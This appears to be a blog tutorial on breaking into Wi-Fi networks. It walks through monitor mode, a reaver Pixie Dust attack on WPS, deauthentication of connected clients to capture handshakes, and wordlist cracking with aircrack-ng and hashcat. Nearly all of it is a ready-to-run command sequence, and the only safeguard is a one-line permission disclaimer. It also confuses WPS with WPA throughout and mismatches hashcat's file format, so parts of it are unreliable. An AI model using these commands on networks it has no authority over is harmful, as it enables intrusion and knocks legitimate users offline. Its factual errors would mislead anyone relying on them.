Disclaimer: It is a good idea to test your own personal wireless network or your company wireless network. Do this at your own risk and make sure you have permission to do the below.

The tools we will use

ToolPurpose
airmon-ngGet your wireless NIC into monitor mode
airodump-ngList all the wireless networks your wireless NIC can see
reaver (wash)WPS based cracking
aireplay-ngTo deauth clients for WPS based cracking
aircrack-ngTo crack the password of a captured WPS handshake
hashcat (optional)Faster than aircrack-ng and can use your GPU

Step 1: Get your wireless NIC into monitor mode

Get your wireless NIC name. Usually it is wlan0

iwconfig

Now kill all processes that might hold on to that NIC preventing it from going into monitor mode, such as Network Manager.

sudo airmon-ng check kill

And now put your NIC into monitor mode:

sudo airmon-ng start wlan0

Run iwconfig again, you should now see something like wlan0mon and it should show mode:monitor. Take note not all wireless NICs can go into monitor mode.

Get your wireless NIC out of monitor mode and put things back the way they were

This will put things back to normal:

sudo airmon-ng stop wlan0mon
sudo service NetworkManager restart

Step 2: Airodump

Now run this command

sudo airodump-ng wlan0mon

If all goes well, you will see output such as this:

airodump output

The above command will channel hop, i.e. scan all channels, so if you want to monitor only a specific channel, run this command:

sudo airodump-ng -c 6 wlan0mon

And if you want to save the captured packets to a file, run this command:

sudo airodump-ng -w capture wlan0mon

Step 2.1: Reaver and wash for WPS

Lets sidetrack to reaver quickly as it focuses mainly on WPS, which can be quite a lucrative attack vector. WPS2, which most devices are using nowadays, are not that susceptible to WPS attacks, but it is definitely worth a look.

Just like airodump above showed us wireless routers and their encryption and cipher, wash will show us the same information but for WPS and the version of WPS the wireless routers are using.

sudo wash -i wlan0mon
reaver wash output

Once you have find a suitable target, run this command:

sudo reaver -i wlan0mon -b <target_bssid> -c <channel> -K 1

(K 1 tells reaver to use the Pixiedust attack)

Take note that you can lock WPS on the wireless router if you are not careful, so check the reaver help with sudo reaver -h to see how you can slow things down a bit

Step 3: WPS handshake attack

In this section we will now focus on getting that WPS handshake that we can crack offline using a wordlist such as rockyou.txt.

Run the below command to start capturing packets for only 1 specific wireless router and to see which clients are connected to this wireless router. We will grab WPS handshake packets from these clients.

(The output file issued in the below command will contain the captured packets which we will use when cracking the password)

sudo airodump-ng -c <channel> --bssid <BSSID> -w <output_file> wlan0mon
airodump single client
  • The green block is the BSSID we are sniffing for clients
  • The yellow block are all the clients connected to this BSSID
  • The red block above that reads “WPA handshake: C8:51:*” will be displayed when we capture a WPS handshake which we will get to below.

Forcing a deauth to get a WPS handshake

You can either wait for a handshake to occur, which happens when a client connects or a connected client reauthenticates, or you can force a connected client to reauthenticate. We will force a client to reauthenticate by sending deauth packets to that client.

Open up a new terminal and issue this command:

sudo aireplay-ng --deauth 10 -a <BSSID> -c <Client_MAC> wlan0mon
deauth output

You will know the deuth was successful when the terminal in which airodump is running displays this in the top right corner:

successful deauth

Step 4: Crack the WPS password

Lets validate our output file to make sure it does contain a valid handshake:

sudo aircrack-ng <output_file>.cap
validate output capture file

Wordlists

You should have several wordlists in /usr/share/wordlists but we will use rockyou.txt. Unzip rockyou.txt.gz using this command:

sudo gunzip rockyou.txt.gz

Now you can start the cracking process

sudo aircrack-ng <output_file>.cap -w /usr/share/wordlists/rockyou.txt

This will take quite some time depending on your CPU. On my old 4th gen dual core i5 laptop CPU, I only get 3500 or so hashes per second, which is extremely slow compared to a modern CPU or GPU.

Below is a bonus section where we will use hashcat.

Bonus Section: Hashcat

Hashcat tends to be quite a bit faster, in my case, about 15% on the CPU, plus it allows you to use your GPU if it is supported.

We first have to get the cap file into hashcat format:

sudo apt-get install hcxtools
sudo hcxpcapngtool -o <output_file>.hccapx <input_file>.cap

To see if you can use your GPU issue this command:

sudo hashcat -I

This will show all the devices you can use in the cracking process. I only have 1 device so I will specify “-d 1” in my hashcat command to use the first device which is my CPU.

Lets fire up hashcat to crack the password:

hashcat -m 22000 -a 0 -d 1 capture.hccapx /usr/share/wordlists/rockyou.txt

Now just let it finish and see if rockyou.txt contained the password!